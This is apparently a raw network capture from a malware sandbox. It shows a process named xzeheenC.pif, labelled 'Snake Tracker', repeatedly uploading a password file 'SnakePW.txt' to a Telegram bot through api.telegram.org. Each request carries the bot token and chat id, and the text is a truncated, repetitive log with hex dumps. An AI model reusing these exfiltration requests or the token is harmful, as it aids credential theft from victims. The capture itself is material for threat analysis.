                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:15 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419040,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535875,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        13 | 192.168.2.8 | 49725 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:16 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1fe85eef5b42
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:16 UTC | 535 | OUT | Data Ascii: --------------------------8dd1fe85eef5b42Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:16 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:16 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:16 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419042,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535876,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        14 | 192.168.2.8 | 49726 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:17 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f66d44105a7
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:17 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f66d44105a7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:31:17 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:17 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:17 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419044,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535877,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        15 | 192.168.2.8 | 49727 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:17 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1ffccf134830
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:31:17 UTC | 535 | OUT | Data Ascii: --------------------------8dd1ffccf134830Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:31:18 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:18 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:31:18 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 30 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 38 37 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419046,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535878,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49728 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:19 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f7fdbb5edd9
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:19 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f7fdbb5edd9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:19 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:19 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:19 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419048,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535879,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49729 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:20 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2013e4ac1c7c
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:20 UTC | 535 | OUT | Data Ascii: --------------------------8dd2013e4ac1c7cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:20 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:20 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:20 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419050,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535880,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49730 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:21 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f98ce0b208f
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:21 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f98ce0b208fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:21 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:21 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:21 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419052,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535881,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49731 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:21 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f4f20e7a29d
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:21 UTC | 535 | OUT | Data Ascii: --------------------------8dd1f4f20e7a29dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
2024-12-18 15:31:22 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:21 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:22 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419054,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535881,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49732 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:21 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd20298b3b9c53
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:21 UTC | 535 | OUT | Data Ascii: --------------------------8dd20298b3b9c53Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
2024-12-18 15:31:22 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:22 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:22 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419056,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535882,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49733 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:23 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1fb1ab45af37
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:23 UTC | 535 | OUT | Data Ascii: --------------------------8dd1fb1ab45af37Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
2024-12-18 15:31:23 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:23 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:23 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419058,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535883,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49734 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:23 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f6572db528e
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:23 UTC | 535 | OUT | Data Ascii:
--------------------------8dd1f6572db528e
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:31:00
Client IP:
2024-12-18 15:31:23 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:23 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:23 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419060,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535883,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49735 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:23 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd203dc62b7545
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:23 UTC | 535 | OUT | Data Ascii:
--------------------------8dd203dc62b7545
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:30:38
Client IP:
2024-12-18 15:31:24 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:24 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:24 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419062,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535884,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49736 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:25 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1fca735ee8c7
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:25 UTC | 535 | OUT | Data Ascii:
--------------------------8dd1fca735ee8c7
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:30:53
Client IP:
2024-12-18 15:31:25 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:25 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:25 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419066,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535885,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49737 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:25 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1f7bb30cccae
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:25 UTC | 535 | OUT | Data Ascii:
--------------------------8dd1f7bb30cccae
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:31:00
Client IP:
2024-12-18 15:31:25 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:25 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:25 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":419068,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535885,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49739 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:25 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd205347cb53af
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:25 UTC | 535 | OUT | Data Ascii:
--------------------------8dd205347cb53af
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:30:38
Client IP:
2024-12-18 15:31:26 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:26 GMT
Content-Type: application/json
Content-Length: 517
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:26 UTC | 517 | IN | Data Ascii: {"ok":true,"result":{"message_id":419070,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535886,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 49740 | 149.154.167.220 | 443 | 3428 | C:\Users\Public\Libraries\xzeheenC.pif

Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:31:27 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd1fe3262ebcfc
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:31:27 UTC | 535 | OUT | Data Ascii:
--------------------------8dd1fe3262ebcfc
Content-Disposition: form-data; name="document"; filename="SnakePW.txt"
Content-Type: application/x-ms-dos-executable

PW | user | Snake

PC Name:124406
Date and Time: 18/12/2024 / 10:30:53
Client IP:
2024-12-18 15:31:27 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:31:27 GMT
Content-Type: application/json
Content-Length: 517
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:31:27 UTC | 517 | IN | Data Ascii: {"ok":true,"result":{"message_id":419072,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535887,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        28 | 192.168.2.8 | 49741 | 149.154.167.220 | 443 | 7064 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:27 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd1f9342a18464
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Data Ascii: --------------------------8dd1f9342a18464Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:31:28 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:31:27 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419074,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535887,"documen


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        29 | 192.168.2.8 | 49742 | 149.154.167.220 | 443 | 6760 | C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-18 15:31:27 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2068b658623b
                                                                                                        Host: api.telegram.org
